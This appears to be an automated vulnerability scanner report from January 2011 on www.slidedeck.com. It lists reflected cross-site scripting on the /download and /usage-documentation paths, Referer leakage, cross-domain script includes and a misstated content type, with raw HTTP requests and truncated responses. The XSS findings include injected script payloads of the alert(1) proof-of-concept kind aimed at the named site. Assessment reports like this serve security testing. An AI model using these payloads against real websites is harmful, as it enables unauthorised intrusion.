1. Cross-site scripting (reflected)
1.1. http://www.slidedeck.com/download [REST URL parameter 1]
1.2. http://www.slidedeck.com/usage-documentation [REST URL parameter 1]
3. Cross-domain Referer leakage
4. Cross-domain script include
6. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://www.slidedeck.com |
Path: | /download |
GET /download71eb8--><script>alert(1)< Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:10:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 03:10:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28374 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.slidedeck.com |
Path: | /usage-documentation |
GET /usage-documentation5bb51--><script>alert(1)< Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:09:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 09 Jan 2011 03:09:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28407 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... <!-- This Quick Cache file was built for ( www.slidedeck.com/usage ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.slidedeck.com |
Path: | / |
GET / HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Sun, 02 Jan 2011 03:07:02 GMT Last-Modified: Sun, 09 Jan 2011 03:08:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46540 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... <p><a href="http://www ...[SNIP]... </h5> <a href="http://www <a href="http://www <a href="http://www ...[SNIP]... </h5> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </a> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </h5> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </a> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... </a> <a href="http://www <img src="http://www.slidedeck ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.slidedeck.com |
Path: | / |
GET /?ref= HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:07 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Sun, 02 Jan 2011 03:08:07 GMT Last-Modified: Sun, 09 Jan 2011 03:08:07 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45984 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... </title> <link rel="profile" href="http://gmpg.org/xfn <link rel="stylesheet" type="text/css" media="all" href="http://www ...[SNIP]... <link rel='stylesheet' id='avhec-widget-css' href='http://www <script type='text/javascript' src='http://ajax ...[SNIP]... <![endif]--> <script type="text/javascript" src="//www.hellobar.com ...[SNIP]... <noscript> The Hello Bar is a simple <a href="http://www.hellobar ...[SNIP]... <div id="tweetMeme" class="floatR noDownload"> <a href="http://twitter.com ...[SNIP]... </p> <a class="rss" href="http://feeds ...[SNIP]... <div class="post"><a href="http://feedproxy ...[SNIP]... <div class="post"><a href="http://feedproxy ...[SNIP]... </div> <a href="http://feeds ...[SNIP]... <div id="twitter-feed"> <a href="http://twitter.com ...[SNIP]... <div class="post">New Release: jQuery Library Bug Fixes & New WordPress Skin <a href="http://goo.gl/fb ...[SNIP]... <div class="post">Customizing and Debugging SlideDeck with FireBug Part 1 <a href="http://goo.gl/fb ...[SNIP]... </div> <a href="http://twitter.com ...[SNIP]... <p><a rel="nofollow" href="http://www ...[SNIP]... <li><a class="twitter" href="http://twitter.com ...[SNIP]... <li><a class="facebook" href="http://www.facebook ...[SNIP]... <li><a class="rss" href="http://feeds ...[SNIP]... <p>SlideDeck ® is a registered trademark of <a href="http://www ...[SNIP]... <li id="menu-item-17" class="menu-item menu-item-type-custom menu-item-17"><a rel="external nofollow" href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.slidedeck.com |
Path: | / |
GET / HTTP/1.1 Host: www.slidedeck.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:03 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Sun, 02 Jan 2011 03:07:02 GMT Last-Modified: Sun, 09 Jan 2011 03:08:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.slidedeck.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46540 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta charset=" ...[SNIP]... <link rel='stylesheet' id='avhec-widget-css' href='http://www <script type='text/javascript' src='http://ajax ...[SNIP]... <![endif]--> <script type="text/javascript" src="//www.hellobar.com ...[SNIP]... </a><script type="text/javascript" src="http://platform ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.slidedeck.com |
Path: | / |
GET /?ws_plugin__s2member_js Host: www.slidedeck.com Proxy-Connection: keep-alive Referer: http://www.slidedeck.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:30:07 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Expires: Sun, 16 Jan 2011 03:30:08 GMT Last-Modified: Sun, 09 Jan 2011 03:30:08 GMT Cache-Control: max-age=604800 Pragma: public Vary: Accept-Encoding Connection: close Content-Type: text/javascript; charset=utf-8 Content-Length: 31679 var S2MEMBER_VERSION = '3.3.2',S2MEMBER_CURRENT ...[SNIP]... ILE_DOWNLOADS_ALLOWED jQuery(document).ready ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.slidedeck.com |
Path: | /wp-content/plugins |
GET /wp-content/plugins Host: www.slidedeck.com Proxy-Connection: keep-alive Referer: http://www.slidedeck.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:30:07 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Tue, 04 Jan 2011 21:37:01 GMT ETag: "eb1898-30bd-119cf940" Accept-Ranges: bytes Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript Content-Length: 12477 /** * SlideDeck 1.2.1 Pro - 2011-01-03 * Copyright (c) 2011 digital-telepathy (http://www.dtelepathy * * BY USING THIS SOFTWARE, YOU AGREE TO THE TERMS OF THE SLIDEDECK * LICENSE AGRE ...[SNIP]... |